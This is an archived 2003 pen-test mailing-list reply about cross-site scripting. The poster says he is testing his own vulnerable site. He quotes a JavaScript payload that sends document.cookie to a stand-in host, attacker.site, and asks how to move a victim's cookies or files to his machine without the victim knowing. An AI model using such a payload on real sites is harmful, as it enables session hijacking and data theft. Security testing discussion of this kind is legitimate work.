RE: Proof of Concept Tool on Web Application Security

From: Indian Tiger (indiantiger@mailandnews.com)
Date: 04/13/03

Next message: Dawes, Rogan (ZA - Johannesburg): "RE: Proof of Concept Tool on Web Application Security"

Previous message: Mhal: "Re: connect-back win32 shellcode"
Maybe in reply to: Indian Tiger: "Proof of Concept Tool on Web Application Security"
Next in thread: Nicolas Gregoire: "RE: Proof of Concept Tool on Web Application Security"
Reply: Nicolas Gregoire: "RE: Proof of Concept Tool on Web Application Security"
Reply: Robert Auger: "RE: Proof of Concept Tool on Web Application Security"
Reply: Jon Pastore: "Re: Proof of Concept Tool on Web Application Security"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Sun, 13 Apr 2003 03:33:12 -0400
From: Indian Tiger <indiantiger@mailandnews.com>
To: pen-test@securityfocus.com, rdawes@deloitte.co.za

Hi Rogan,

Comments in-line

[script language=javascript]document.print("<img
src='http://attacker.site/snarf?" + document.cookie + "'>")[/script]

I have tested this and it works perfectly fine. In my scenario I gave as
follows and it was working:
<script> alert(‘hacked’) </script>

Now I am testing Cross-Site Scripting to steal the client cookies, or any
other sensitive information. I am working on my own pen-test-testing site,
which is vulnerable to XSS. I was able to display the cookies of the client at
the victim’s machine, but that was not my goal, my goal is to get that cookies
on my machine or any desired location. So is there any way by which I can
transfer the victim’s cookie or any other information at my machine without
interaction of the victim.

One way of transferring cookie information from the victim’s machine to
attacker’s machine is to create a hidden filed & then transfer cookie
information to that hidden field & then post (submit) this hidden field to web
site of attacker. But this require interaction of victim, as victim must click
on submit button to post this data to attacker’s site, which is not a good
idea, the data should be transferred without knowledge of victim. So what
should be the best way to this? How I can upload a file from victim machine to
any other server?

Any suggestions on the above topics will be highly appreciated.

Thanking you,
Sincerely,

Indian Tiger, CISSP

--------------------------------------------------------------
Costs are climbing and complaints are rising
as SPAM overloads your e-mail servers and Inboxes
SurfControl E-mail Filter puts the brakes on spam & viruses
and gives you the reports to prove it.
http://www.securityfocus.com/SurfControl-pen-test2
Download a free trial and see just
what's going in and out of your organization.
--------------------------------------------------------------

Next message: Dawes, Rogan (ZA - Johannesburg): "RE: Proof of Concept Tool on Web Application Security"

Previous message: Mhal: "Re: connect-back win32 shellcode"
Maybe in reply to: Indian Tiger: "Proof of Concept Tool on Web Application Security"
Next in thread: Nicolas Gregoire: "RE: Proof of Concept Tool on Web Application Security"
Reply: Nicolas Gregoire: "RE: Proof of Concept Tool on Web Application Security"
Reply: Robert Auger: "RE: Proof of Concept Tool on Web Application Security"
Reply: Jon Pastore: "Re: Proof of Concept Tool on Web Application Security"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]